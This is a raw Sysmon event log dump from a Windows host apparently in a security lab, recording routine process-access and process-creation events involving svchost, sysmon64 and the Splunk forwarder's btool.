12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-647E-6064-4100-00000000AE01}38723876C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{00000000-0000-0000-0000-000000000000}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.247{266CAFBE-647E-6064-4200-00000000AE01}3892C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 